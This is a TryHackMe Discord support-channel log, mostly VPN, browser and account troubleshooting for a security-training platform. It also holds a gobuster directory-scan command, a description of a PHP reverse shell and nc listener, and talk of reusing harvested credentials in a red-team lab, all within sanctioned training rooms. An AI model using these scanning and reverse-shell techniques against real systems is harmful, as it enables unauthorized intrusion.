#site-support

1 messages · Page 59 of 1

spark bison
#

I'm hoping someone can help me... I had a streak of 36 just yesterday and when I logged on today, I'm back down to 1?

#

I don't understand why my streak went down?

#

I always answer at least a question or two a day, some days I get a whole bunch done

plucky talon
#

Thx for the info. But, i've already tried that. It seems that i forgot my password. Is there any alternative solution?

scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 430)

ivory spruce
ivory spruce
#

Which virtual machine are you referring to?

plucky talon
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

ivory spruce
solar jewel
#

Chrome and Opera

safe dune
#

Hi Everyone.. I don't know why but my machines just won't start on tryhackme. I'm a paid user, but some pages don't even load up fully

weary spindle
#

Which machine?

safe dune
#

The one in the Upload Vulnerabilities room. It was working just fine last night, till it suddenly disconnected and refused to restart since

weary spindle
#

If so, have you pointed the hosts file to the new IP?

safe dune
#

I'm beginning to realize that it might be a problem with my browser, but I'm not sure what exactly the issue is. I'm using Google Chrome and I've noticed that my dashboard page remains loading forever. I'm not able to see my rank or my skill matrix as it keeps loading

#

I also can't view my learning paths unless I type out the exact directory in the address bar. What could be the problem?

weary spindle
#

Have you tried clearing cache and cookies?

Perhaps switching browsers?

ivory spruce
safe dune
scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 1984)

weary spindle
safe dune
#

Ohh. I see. Thank you

plush hamlet
#

Hello, im having the issue, that i cant connect via openvpn. it says that the cipher is not supported. any ideas?

wind wedge
#

Can you share a screenshot of your output?

plush hamlet
#

nvm, i just downloaded another ovpn file and now it worked fine again. but thank you

hazy jay
topaz iron
#

is just me or THM is having some problems? any time I try to connect or im doing a box, the machine be going extra slow

bronze vale
#

Send a screenshot of your OpenVPN output

#

What room are you doing?

#

What makes you think it’s slow?

#

Try reducing the MTU size

bronze vale
#

Have you tried accessing a different room?

#

Is your internet connection strong?

tranquil owl
#

Is there an admin here that can help me figure out why I can't use the koth room?

wind wedge
tranquil owl
#

Yes

wind wedge
#

You have to verify

tranquil owl
#

I did

west chasmBOT
wind wedge
#

With the THM bot?

tranquil owl
#

Let me.try that link you posted

#

Yes, I verified, still can't do anything

glad oyster
#

@bronze vale

tranquil owl
#

Meh, seems to be working now... thx

rigid sand
#

hi guys, I need some support about vpn -> mtu..

┌──(kali㉿kali)-[~]
└─$ date && vpn/tryhackme/thm-troubleshoot
Tue Feb 20 17:11:55 CET 2024

Looks like you're running Kali @MuirlandOracle

[-] Script is being run as a low-privileged user
Would you like to run this script with higher privileges automatically (Y/n)?
[+] Re-running with root permissions
[-] Config not found in current directory
Please enter the path to your config: vpn/tryhackme/*_eu_vip_1.ovpn
[+] Config Located successfully
[+] Stable internet connection
[+] OpenVPN is installed
[+] tun0 exists
[+] tun0 IP is in the correct range
[+] Only one instance of OpenVPN is running
[+] Confirming connectivity
[-] MTU value failed at 1000, aborting MTU check
[-] Something went wrong -- please ask for further assistance in the TryHackMe Discord server, subreddit, or forum

┌──(kali㉿kali)-[~]
└─$ date
Tue Feb 20 17:12:48 CET 2024

frank flax
#

2024-02-20 20:59:58 TCP/UDP: Preserving recently used remote address: [AF_INET]18.202.168.160:1194
2024-02-20 20:59:58 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-20 20:59:58 UDPv4 link local: (not bound)
2024-02-20 20:59:58 UDPv4 link remote: [AF_INET]18.202.168.160:1194
2024-02-20 20:59:58 TLS: Initial packet from [AF_INET]18.202.168.160:1194, sid=91663e1d c24621d9
2024-02-20 20:59:58 VERIFY ERROR: depth=1, error=self-signed certificate in certificate chain: CN=ChangeMe, serial=425397202556807641543660048237946304772097879576
2024-02-20 20:59:58 OpenSSL: error:0A000086:SSL routines::certificate verify failed:
2024-02-20 20:59:58 TLS_ERROR: BIO read tls_read_plaintext error
2024-02-20 20:59:58 TLS Error: TLS object -> incoming plaintext read error
2024-02-20 20:59:58 TLS Error: TLS handshake failed
2024-02-20 20:59:58 SIGUSR1[soft,tls-error] received, process restarting
can someone help me with this error while using opnvpn to use ovpn file

rigid sand
wind wedge
#

Dammit Scrubz every time

rigid sand
wind wedge
#

You're running another vpn do sudo killall openvpn then try to rerun the vpn

rigid sand
#

same with eu_vip_1

weary spindle
#

Tun1

#

Oh, Blackout caught it

frank flax
rigid sand
weary spindle
naive dust
#

hey can someone try connecting to the AU server?

#

i was able to connect to it like 30 mins back

#

right now i cant seem to reconnect

#

to it

frank flax
hard zephyr
#

this link that is on "walking the application" on tryhackme, does it still work for anyone, it doesn't work for me. this is the link https://lab_web_url.p.thmlabs.com/

#

please who can help

weary spindle
hard zephyr
#

I waited 2 minutes as well

#

maybe someone should try it now on the website and see if it works

weary spindle
#
  1. I clicked the start machine button.

  2. After 60 seconds, the URL updated to show the machine IP.

short saffron
eager fulcrum
short saffron
#

here's wreath's url = https://tryhackme.com/room/wreath

short saffron
eager fulcrum
#

Do you have a 7 day streak?

short saffron
#

no

eager fulcrum
#

Then you don't have access yet

short saffron
#

oh

eager fulcrum
#

Yeah the UI isn't very clear

short saffron
#

so i have to join room when i have 7 day streak and then ill have constant access?

eager fulcrum
#

That I'm not so sure about

#

I think so

weary spindle
#

You do. 🙂

short saffron
#

okay, thanks

weary spindle
#

It's on this part.

I have made the suggestion for it be made clearer, or a window opens letting you know if you don't have access, any sort of feedback really.

short saffron
#

could you guys make difficulty filter a checkbox

short saffron
weary spindle
#

there is one.

short saffron
#

cuz it allows one choice currently

#

i cannot choose multiple difficulties

weary spindle
#

Oh! multiple.

#

I get you now.

short saffron
#

yeah

turbid bison
#

Hello any tryhackme staff members here

patent hazel
#

Hello, I am in exploiting AD room, and since the begining I am in the network 10.200.79.0 and it switch to another network. Is that possible to put me back at the initial network please?

plush bay
plush bay
patent hazel
#

Because I could continue from my initial network but it seems down so.. I’m stuck 😂

plush bay
patent hazel
#

Ok ok thank you for your answer !

plush bay
#

no problem

vital anvil
#

Hello I have a question
What time of day does the server restart the response streak?
I'm from Argentina, GMT-3 here.

brittle pier
#

Hey, first time this has happened before but a flag seems to be broken on the "Walking an Application" room. The final task, for retrieving a flag out of a response header isn't allowing me to submit. I've confirmed it's the correct flag as others have completed using this flag too. Just won't submit for me :s

#

nvm i found a flag for the next room rather than the one i needed lmao

solar jewel
high walrus
#

hello, is there a way to see all the rooms you have joined but not completed? "Recent rooms" doesn't show everything

wind wedge
scenic torrentBOT
#

Gave +1 Rep to @wind wedge (current: #86 - 73)

wind wedge
#

Which room are you doing?

#

It doesn't ask you to ssh in

#

Are you on Windows or Linux?

glacial hound
#

What room are you doing?

wind wedge
#

Intro to offensive security, you're not suppose to ssh in

glacial hound
#

Are you trying to ssh into the machine in task 2? How do you know the SSH credentials if they weren't provided? Not all VM's will have the same default credentials, that wouldn't be very secure, and would defeat the purpose of learning how to hack into a machine.

#

What web version? The attackbox and Task VM are two different machines

wind wedge
#

Do you click split show view at the top?

glacial hound
#

SSH is used as a way for you to connect to a comupter remotely and securely, so if all computers running SSH had the same credentials, then hackers wouldn't need much effor to get into corporate or private networks 🙂

#

Ah I see, you won't be able to SSH into that VM as that's not how the room is intended to be solved.

#

Even if you could SSH into it, it wouldn't really affect the websites performance for you. The only difference is that with the Attackbox you access the website via the attackboxes web browser, whereas with OpenVPN you can access it through your machines browser.

#

Surprised to hear it's slow for you though

#

To be able to connect to TryHackMes network with your own VM, instead of using the web-based Attackbox.

#

You're using openVPN with your machine, to allow it to communicate with other machines on THMs network

#

No you're not, these are very valid and important questions, understanding how THM works from a network perspective will help with troubleshooting and general problem solving when it comes to challenge rooms 🙂

There is a section about the VPN here https://tryhackme.com/r/resources/blog/tryhackmes-vpn-explained

Let me know if you have any follow up questions

#

We recommend using VMs because this is considered best practice for Security, and it will create a good habit 🙂

#

When learning about cyber, you will, without a doubt, make mistakes and sometimes do things you might not fully understand. So, doing all of this in a safe and secure environment is important. If you have the resources to run a VM, for example, with Ubuntu or Kali, I highly encourage you to use it. Plus, it will teach you about VMs and how to configure them, which will come in handy

weary spindle
#

Just minimise the terminal, leave it running and that's you, good to go.

You can nmap the Ip etc

glacial hound
#

Once you're conected you can do the same stuff with your VM as you would do from our Attackbox

#

No, because without openVPN your Mac is not connected to the same private network as our machines

#

If you're using a kali VM, you will have most of the tools pre installed, so you can start running commands from your terminal. If you're using Ubuntu, you can download them via the terminal. It will be harder to find all of those tools on Mac, and as mentioned earlier, using your host for learning how to hack is not recommended 🙂

#

Type the task VMs IP address (with the correct protocol, so http here) into your machines browser

weary spindle
#

No

#

This is one room I suggest doing in the split screenmachine,

#

So you'd be attacking a real website.

However you're thought is correct.

You'd just use the ip. (but not for fakebank.thm)

glacial hound
#

gobuster -u http://myip<> -w wordlist/rockyou.txt dir -> Not your IP no, the target machines IP, AKA the one that is running the webserver you want to attack

#

Gobuster is a tool that tries to find hidden directories in websites, so for example, if fakebank.com has an admin login page, fakebank.com/admin_login, then gobuster would be able to tell you. Gobuster uses huge wordlists of common file and directory names, and tries them all on the target webiste to see if they are valid

dire heron
#

Hey, i want to delete my payment credentials. I couldnt find a way to do it, is there a way?

bold isle
#

Hi! I am planning to buy vouchers, how long do I have to redeem them? Is there an expiry date?

bold isle
#

thanks a lot! that's good news 😉

ivory spruce
glacial hound
#

Hi, can I DM you?

scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 431)

dull moss
#

Hey there.
I just registered using the referral link my friend sent me, but I can't use the discount code to buy premium sub. It says invalid coupon code

plush bay
#

check the mtu on your tun0 device and maybe try lowering it to 1200 if it is on 1500

scenic torrentBOT
#

Gave +1 Rep to @plush bay (current: #4 - 1639)

solar jewel
#

@ivory spruce pls I'm still having issue with the tryhackme not showing in desktop view

#

I'm using chrome

wind wedge
#

What issues are you having?

solar jewel
#

The thing is the website is not responding to desktop view

wind wedge
#

You're trying to view tryhackme on your mobile?

solar jewel
#

Yes. See here

wind wedge
#

THM isn't designed for mobile, it might be a bit tricky

solar jewel
#

Ok, but I've been using the desktop view for a while now and I had no issue.

Thanks for helping out

topaz iron
solar jewel
#

Yes

topaz iron
#

Your house TV must be connected to the internet, using a chrome browser you will be able to cast your phone display into the TV, this way you can view the whole display and hack just using you phone

#

if you can get a chromecast even better

#

the old chromecast is very cheap not even 20 dollars I think, thats how the kid that had uber hacked using his tv

solar jewel
#

There's no tv where I'm staying currently.
Thanks anyway... I'll find other solutions

#

Really appreciate

topaz iron
#

I see, no problem.

dense pagoda
#

ayo hi guys. i am not sure if this is the best place to ask but i have problem with my virtual machine(i know this is site-support room but idk where to ask). after i completed a room on thm i disconnected from the vpn all good, next day when i logged in on my machine i dont have network anymore, eth0 state is down. i tried everything from google but nothing good. do u have any ideeas?

topaz iron
dense pagoda
#

it is

#

but

#

its down

topaz iron
#

what do you mean with down?

dense pagoda
#

when i try to ping i get network inreachable

#

on "ip a" command

#

eth 0 has "state DOWN"

topaz iron
#

eth0 is not tryhackme is you wifi

dense pagoda
#

i kno

topaz iron
#

aah just put back up

#

run eth0 up

dense pagoda
#

it doesnt work

#

i tried

topaz iron
#

ifconfig eth0 up

dense pagoda
#

i asked here cz, before i finished a room on thm eveything was good. after i disconnected from the vpn and restarted the machine eveything is messed up

dense pagoda
topaz iron
#

maybe is just using a different name other than eth0

dense pagoda
#

idk, on ifconfig i have eth0 there.

vestal tartan
#

i am getting this while trying to connect to openvpn

wind wedge
#

What server are you on?

vestal tartan
#

i am getting the same in EU-Regular-2 + EU-Regular-1

wind wedge
#

Can you try and regenerate, wait for 3 mins then try to run again

#

@vestal tartan Did it manage to work?

vestal tartan
gilded cipher
#

Hey this might be outside of working hours for support. But I am having trouble with OpenVPN. Might be my firewall rules. I typically just use the attackboxes. I am in the active directory basics room trying to remote into another user's computer. I tried doing it on the domain controller on the attackbox, but that is not working. Maybe I am not using rdp correctly? Not sure.

#

I saw that someone was able to rdp after configuring openvpn though and so that is the path I have been trying to take.

#

Know what! I just solve the issue. Thought I was stuck, but I was one more step from finding the solution. LOL

nimble cedar
#

Is anyone available to help troubleshoot a vpn connection ? Im working on reverse shells and Im not able to connect the shell to my listener on my machine to the host. I tried the attack box and the shells worked perfectly on the webserver

tiny token
#

I need Support i have issue

ivory spruce
ivory spruce
west chasmBOT
ivory spruce
tiny token
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 432)

ivory spruce
tiny token
quasi mango
#

hi guys i have one query while solving a room on introductory networking. so i was on task no.8 networking tools dig. so there is question:-
Where is the very first place your computer would look to find the IP address of a domain?
i reserched it but answere i got is local cache
but the problem is it shows wrong ans
and ans format of the question is Answer: * **
does any one know about this room or ans?

weary spindle
quasi mango
#

on internet

weary spindle
#

You're giving me more questions than answers dude.

#

Where on the internet did you find that information?

quasi mango
#

i just search it on chrome

weary spindle
#

Ok.

Please read the task information, All answers can be found in there.

#

It's even highlighted.

quasi mango
#

ok thnx

surreal panther
#

Hi I would like to get back my streak

weary spindle
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

surreal panther
#

Thank you @weary spindle for always helping 🙏

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 1995)

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 1996)

weary spindle
quasi mango
#

am not sister. I am male bro

glacial hound
quasi mango
#

bro is casual term even used for any female friends

naive dust
#

hi, do I need to contact tryhackme support email to get help regarding trouble with logging in to my account on the website?

weary spindle
naive dust
#

I'm waiting for their reply

weary spindle
#

Just wait patiently, don't E-mail more than once within 7 days or you'll push your E-mail back down the list.

unreal mortar
#

hey there, I'm having a. strange issue I hope someone can help me with. I am connecting to thm through openvpn. I can ping my active rooms and everything seems to be working fine. But on the dashboard on thm it says I'm disconnected and doesn't give me my IP address?

weary spindle
#

That's a bug, it's cool, ignore it

unreal mortar
#

how do I get my IP address then? sorry silly question

weary spindle
weary spindle
paper nest
#

hello, does anyone here know why the number of completed rooms displayed on my public profile is incorrect?

unreal mortar
#

thank you @weary spindle

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 1997)

paper nest
#

i get 180 completed rooms, while my public profile says 143

#

maybe i'm missing something about the way the number of completed rooms is calculated

wheat wagon
#

If i am not mistaken "My Rooms" section also includes private rooms and such. Public profile might not include those and that might be the reason.

unreal mortar
#

I also have two other random questions:
1.) I'd love to know how the hours active are calculated, as mine is def short. I feel like it is saying on average this section should take x person an hour?
2.) is there a better way to get back to my paths from a room? when I'm in a room it seems like to get back to my tracks I have to click to the dashboard, click paths etc.

paper nest
#

i thought about this, it doesn't seem to justify the difference of 37 rooms

weary spindle
upbeat totem
#

Hello ,
I need some help in Network services (1-2). I'm facing problems with scanning the IP addresses . Every time I do an nmap scan , all ports are being filtered or closed and it doesn't even showed . I got a message saying that all 1000 ports are closed and I can't even see one port to complete the room .

wheat wagon
silver python
#

Hello Everyone, I'm having an issues with Lab every time I put the ip address It says server not found .

paper nest
#

thank you @wheat wagon

scenic torrentBOT
#

Gave +1 Rep to @wheat wagon (current: #175 - 34)

weary spindle
silver python
#

It also giving me an error 405.

weary spindle
#

You're entering the same IP as the Attackbox

You need to start the machine in the task material also

silver python
#

No, I'm working on DAST.

weary orchid
#

Hey I am facing some problem in connecting openvpn can someone pls help....

weary spindle
#

What problem?

weary orchid
#

4-02-22 12:08:36 UDPv4 link local: (not bound)
2024-02-22 12:08:36 UDPv4 link remote: [AF_INET]3.7.33.194:1194

#

getting this

#

2024-02-22 12:09:36 TLS Error: TLS key negotiation failed to occur within 60 seconds (check your network connectivity)
2024-02-22 12:09:36 TLS Error: TLS handshake failed
2024-02-22 12:09:36 SIGUSR1[soft,tls-error] received, process restarting
2024-02-22 12:09:36 Restart pause, 1 second(s)
2024-02-22 12:09:37 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194
2024-02-22 12:09:37 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-22 12:09:37 UDPv4 link local: (not bound)
2024-02-22 12:09:37 UDPv4 link remote: [AF_INET]3.7.33.194:1194

weary orchid
#

in windows also i am facing problem

wind wedge
#

Regenerate your openvpn file

weary orchid
#

okayy

weary orchid
wind wedge
#

What OS are you on

weary orchid
#

linux

#

kali in vm

#

2024-02-22 12:15:32 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
is i have to change something ??

#

@wind wedge

wind wedge
#

Shouldn’t have to

weary spindle
#

Which country are you in?

weary orchid
#

india

weary spindle
#

Can you try an alternative server?

weary orchid
#

i should use in-regular-1 server or other ??

weary orchid
#

2024-02-22 12:29:46 TLS Error: TLS handshake failed
2024-02-22 12:29:46 SIGUSR1[soft,tls-error] received, process restarting
2024-02-22 12:29:46 Restart pause, 2 second(s)
2024-02-22 12:29:48 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194
2024-02-22 12:29:48 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-22 12:29:48 UDPv4 link local: (not bound)
2024-02-22 12:29:48 UDPv4 link remote: [AF_INET]3.7.33.194:1194

weary spindle
#

Try a different server altogether.

Is your VM time synched?

weary orchid
weary spindle
#

Right click your clock

weary orchid
#

got it

#

2024-02-23 00:15:41 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-02-23 00:15:41 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-02-23 00:15:41 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-02-23 00:15:41 OpenVPN 2.6.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-02-23 00:15:41 library versions: OpenSSL 3.1.4 24 Oct 2023, LZO 2.10
2024-02-23 00:15:41 DCO version: N/A
2024-02-23 00:15:41 TCP/UDP: Preserving recently used remote address: [AF_INET]3.7.33.194:1194
2024-02-23 00:15:41 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-23 00:15:41 UDPv4 link local: (not bound)
2024-02-23 00:15:41 UDPv4 link remote: [AF_INET]3.7.33.194:1194

#

thanks for helping @weary spindle
just fed up with this and i dont wanna do now 😦

scenic torrentBOT
#

Gave +1 Rep to @weary spindle (current: #2 - 1998)

upbeat totem
#

@weary spindle can u help please

#

I need some help in Network services (1-2). I'm facing problems with scanning the IP addresses . Every time I do an nmap scan , all ports are being filtered or closed and it doesn't even showed . I got a message saying that all 1000 ports are closed and I can't even see one port to complete the room .

weary spindle
sacred thicket
#

is anyone here?
im not being able to 'ssh' to nmap machine from THM, help!

weary spindle
sacred thicket
weary spindle
sacred thicket
#

"connection time out"

weary spindle
#

You're not required to.

weary spindle
sacred thicket
weary spindle
sacred thicket
weary spindle
sacred thicket
weary spindle
glacial hound
west chasmBOT
feral arrow
#

Hi, I started a box (Razorblack). it is not responding does not terminate (button) after logging out and in several times nor ..

raven sequoia
#

Hi, can anyone help me how to delete friends?

weary spindle
raven sequoia
#

It doesn’t work because the scroll bar is in the way

weary spindle
#

Can you zoom out the page?

nimble cedar
#

Can anyone here help me troubleshoot a outgoing connection issue from a tryhackme machine to my vm ?

weary spindle
#

Sure, what's up?

nimble cedar
#

let me control v the issue one sec

raven sequoia
nimble cedar
# weary spindle Can you zoom out the page?

Im working on reverse shells in the what the shell room. I can connect to the machine through SSH and get remote code execution by uploading a php shell. I just cant connect back to the listener on my host machine.

I tested the exact reverse shell method in the attack box browser and I had zero issues connecting the shell to the listener.

Im running
Windows 11
[10:40 AM]
and Parrot OS
[10:40 AM]
I ran the openVPN on my host machine and I still wasnt able to catch the reverse shell in the VM

I do have RCE within the cmd line in the url
i can execute basic commands like ls , cd , id, etc
Ive tried python and PHP shells.

image is the pentest monkey php reverse shell from port 1234
second image is pentest monkey php reverse shell from port 80
No connection but I do have a connection refusal error message. Why would tryhackme refuse a connection from one of their vpns ?

weary spindle
#

The daemonise isn't a THM specific one.

nimble cedar
#

I dont know what daemonise means I know they are background processes but I have no idea what it means in this context

#

Per ChatGPT lol , "However, the warning itself is often not fatal, meaning it doesn't prevent the reverse shell from functioning properly. It's more of a notification that the process didn't detach as expected. The shell connection should still be established, but the shell process might remain attached to the terminal session."

weary spindle
#

Which task are you doing?

nimble cedar
#

Room : WhatTheShell
Task : Practice and Examples #2

I can do these examples on the attackbox but its frustrating that I cant get shell connections on my VM

plush bay
#

just for quick sanity check can you show the output of the terminal you are running the vpn in???

weary spindle
#

It worked for me.

#

Uh, is your php file empty?

nimble cedar
weary spindle
nimble cedar
weary spindle
#

Why port 80?

#

Anything under 1024 requires sudo

nimble cedar
#

hmm I didnt know that. Ill try one sec

weary spindle
#

I use 9001-6

I never have anything on those ports.

plush bay
#

uses 5527

#

and 3435

weary spindle
nimble cedar
#

Sigh

weary spindle
#

You're starting nc first, right?

nimble cedar
#

yes i am

#

im positive its a networking issue. I can do this in the attackbox but I am lost on the VM.

#

I think its the route I have to the host

weary spindle
#

I'd say so, because I'm on your target machine.

nimble cedar
#

but i can* ssh so idk

#

one sec ill show you i can get on the machine too with ssh. rev shells are just being blocked

plush bay
#

scrubz what does HMAC authentication failed mean in vpn logs???

weary spindle
#

Possible cipher miss-match?

#

Possible re-generate could fix.

nimble cedar
#

I will try that again but this is my second time today regenerating the config

weary spindle
#

Possibly parrot OS I've seen that OS have some silly errors

#

Do you have a different VM you can try?

nimble cedar
#

ill give kali a shot. maybe HTB is jealous

#

lol

nimble cedar
#

@weary spindle

#

no luck on kali

fierce raven
#

Facing some login issues since today. I have 2FA enabled and after login the site will redirect to 2FA but will stuck in an "redirecton error".

weary spindle
#

That script looks like it's the box that is receiving it

#

This part here. this is the listening IP.

nimble cedar
#

I feel dumb now. Shell achieved. Thank you for help sorry for the bother

weary spindle
#

Man, it's ok.

Now try that from your parrot, lol

#

Did it not click when you could get one from the attackbox using a different IP? 🤔

nimble cedar
#

Parrot is still not working in the vm but kali is fine. I
Im hardheaded I just try to brute most things. It should have clicked lol

tribal burrow
#

is MTU same on kali and parot

nimble cedar
#

I closed the parrot box. but I did increase the mtu before trying again

toxic flint
#

anyone here having a problem with openvpn?

ivory spruce
steel aspen
#

i dont know where to post this. But in the "Room Prerequisites" to "Data Exfiltration" ( rooms/dataxexfilt ) a room named
"DNS Manipulation " is required.
That sounded like a fun room so i clicked on it but it says
"Room is private
...
If this is an error on our behalf. Please contact us. "
This is the link:
https://tryhackme.com/room/dnsmanipulation

Why can't i do this room? i have an active subscription.
Is there some kind of deeper level I need to join ?

wind wedge
steel aspen
topaz iron
plush bay
#

sooo probably a screw up on thm:s part

steel aspen
plush bay
#

thanks for reporting @steel aspen ... will forward to thm staff.... probably a temporary error... should be fine to ignore said private room for now

scenic torrentBOT
#

Gave +1 Rep to @steel aspen (current: #690 - 5)

topaz iron
#

thats weird

#

see im on it right now

plush bay
topaz iron
#

i see

plush bay
#

not gonna go into to much details how to join private rooms as that will get shadow in trouble

steel aspen
#

they dont trust me.... 🤔

plush bay
topaz iron
#

since im in, aint leaving now

#

lol

plush bay
#

fair enoughs

steel aspen
plush bay
steel aspen
#

np , thanks!

plush bay
#

the dns manipulation room is 100% gonna release in the future

#

just not right this instant

#

so probably they just forgot to remove the link while releasing this "new" room and mark it as comming soon

steel aspen
scenic torrentBOT
#

Gave +1 Rep to @plush bay (current: #4 - 1641)

plush bay
#

no problem

brittle pier
#

Hey all, this is probably user error however i can't see the flag for Task 6 Q1 of https://tryhackme.com/room/owaspjuiceshop. I'm in the administration path derived from the JS file that i un-minimised. However, unaware of what im meant to do next as there is no flag here 😂 Appreciate any insight, ty :)

#

ok nvm it gave me the flag but on another tab i had open from earlier lmao

toxic flint
# ivory spruce Can you describe the issue you are having?

2024-02-24 03:08:59 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-02-24 03:08:59 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-02-24 03:08:59 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-02-24 03:08:59 OpenVPN 2.6.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-02-24 03:08:59 library versions: OpenSSL 3.1.4 24 Oct 2023, LZO 2.10
2024-02-24 03:08:59 DCO version: N/A
2024-02-24 03:08:59 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.240.194:1194

toxic flint
#

this is what i get when i try to connect to the openvpn server : 2024-02-24 03:08:59 WARNING: Compression for receiving enabled. Compression has been used in the past to break encryption. Sent packets are not compressed unless "allow-compression yes" is also set.
2024-02-24 03:08:59 Note: --cipher is not set. OpenVPN versions before 2.5 defaulted to BF-CBC as fallback when cipher negotiation failed in this case. If you need this fallback please add '--data-ciphers-fallback BF-CBC' to your configuration and/or add BF-CBC to --data-ciphers.
2024-02-24 03:08:59 Note: '--allow-compression' is not set to 'no', disabling data channel offload.
2024-02-24 03:08:59 OpenVPN 2.6.7 x86_64-pc-linux-gnu [SSL (OpenSSL)] [LZO] [LZ4] [EPOLL] [PKCS11] [MH/PKTINFO] [AEAD] [DCO]
2024-02-24 03:08:59 library versions: OpenSSL 3.1.4 24 Oct 2023, LZO 2.10
2024-02-24 03:08:59 DCO version: N/A
2024-02-24 03:08:59 TCP/UDP: Preserving recently used remote address: [AF_INET]54.193.240.194:1194
2024-02-24 03:08:59 Socket Buffers: R=[212992->212992] S=[212992->212992]
2024-02-24 03:08:59 UDPv4 link local: (not bound)
2024-02-24 03:08:59 UDPv4 link remote: [AF_INET]54.193.240.194:1194
^X@sS^X@sS^X@sS^C2024-02-24 03:09:24 event_wait : Interrupted system call (fd=-1,code=4)
2024-02-24 03:09:24 SIGTERM received, sending exit notification to peer
^C2024-02-24 03:09:24 event_wait : Interrupted system call (fd=-1,code=4)
2024-02-24 03:09:24 SIGINT[hard,] received, process exiting

ivory spruce
#

What VPN server are you trying to connect to? Which country are you residing?

toxic flint
#

i'm trying to connect to US-West-Regular-1, and im from north africa

#

do i have to change the server?

ivory spruce
scenic torrentBOT
#

Gave +1 Rep to @ivory spruce (current: #15 - 435)

karmic salmon
#

hi dears I am playing in the Red Team Capstone Challenge https://tryhackme.com/room/redteamcapstonechallenge I Faced an issue on the VPN Portal that gave us access to enter Internal network I got access for some employee inside the internal network and able to download their VPN profiles and I accessed the internal devices but from yesterday I can't access the VPN portal and test the credintional in SMTP server all are Valids
and I have reached to VPN Portal without login succeded

karmic salmon
#

hello

#

is anyone from support team

drowsy meteor
ivory spruce
west chasmBOT
#
TryHackMe's Email

TryHackMe's support email address.

weary spindle
cedar bay
#

Hi

#

is there any problem with the server right now?

weary spindle
#

Nope, what issue are you having?

cedar bay
#

I'm havieng a issue trying to connect it from the attack box

#

Its impossible toi reach it

weary spindle
#

Is your network ok?

cedar bay
#

I think so, I'm listening music from youtube. But I started to having issues since the last windows update

karmic salmon
weary spindle
cedar bay
#

(╯°□°)╯︵ ┻━┻

cedar bay
#

and when I'm trying to acces to the acme web page it appears a 504 error

#

gateway time-out

weary spindle
cedar bay
#

oh ok ty !

cerulean glade
upbeat totem
small cedar
#

Hello, I have a question about vm timers. I was working on a room and the timer had 30 min left so I extended it. But then the vm terminated itself anyways. Does this mean I lose my progress, need to reset the room and start again, or is there a way to start the box up again without terminating it?

tropic gale
#

hi

plucky prawn
bronze vale
bronze vale
small cedar
#

Thanks for the replies, I am subscribed. I just terminated it and relaunched the vm. The previous steps were easily repeated. This is not the first time my vms have terminated early though, so not sure what's up with that. To be clear, not talking about the attack box, but target vms. When I checked https://tryhackme.com/api/vm/running it showed it still running but remote said false.

kindred radish
#

how do i upload a picture on here

west chasmBOT
weary spindle
gilded dust
#

Is anyone working on the Linux strength training for beginners task 8 ?

#

i am stuck

naive dust
#

I am trying to use openvpngui to use thm's vpn, but I am getting some kind of certificate error and it is not working, what should I do? Kind people, please let me know.

ivory spruce
naive dust
naive dust
naive dust
#

hello, the machine for task 7 - Privilege Escalation: SUID in room Linux Privilege Escalation, doesn't seem to have the permissions require to complete the task, can you confirm?

weary spindle
naive dust
weary spindle
naive dust
weary spindle
naive dust
naive dust
naive dust
#

@weary spindle so i kept going but it seems that nano with SUID is needed to be able to complete the room
update: I was able to do it in a different way but the instructions in the room are wrong, thanks

chilly tapir
#

i tried adding an extra hour to my attackbox when its shows the warning of its gonna expire within few mins and i added an hour then it showed my time limit by adding an hour but still though my attackbox expire after few mins

#

i encountered this issue several times

#

so to get the machine back on again ,i need to suspend the machine inorder to see the visible option (start machine) in that task

#

then only the start machine option is showing for me again which takes few mins to load the attackbox ofc

livid juniper
#

I have actually launched my openvpn in windows host and when I'm trying to bridge the network in VMware so that it connects to my kali Linux it's not happening. I don't want to run my vpn file in kali just from my windows to kali machine.

weary spindle
livid juniper
#

Okayyy got it

ivory spruce
naive dust
karmic crown
#

Hi all, does anyone knows what can I do to got fix my VPN.... recently I migrated from Windows to Linux desktop and then I'm running Kali Linux through GnomeBoxes, and I did the all the instalations, but when I downloded the vpn file, and put to run I got the error that it was not possible to connect and I've checked on the website ( tryhackme ) it's not showing up that is connected too, I've tried to use the THM trobleshooting file, but it's not working as well, when I run says " looks like you're not connected on the internet " but I'm surfing on internet normally and don't have nothing blocking the traffic or something like this, any help will be appreciated

PS. I'm trying to use the US-East-Regular-1

ivory spruce
wise grotto
#

Anyone know what I can do if someone is screwing with a network I'm trying to work through?

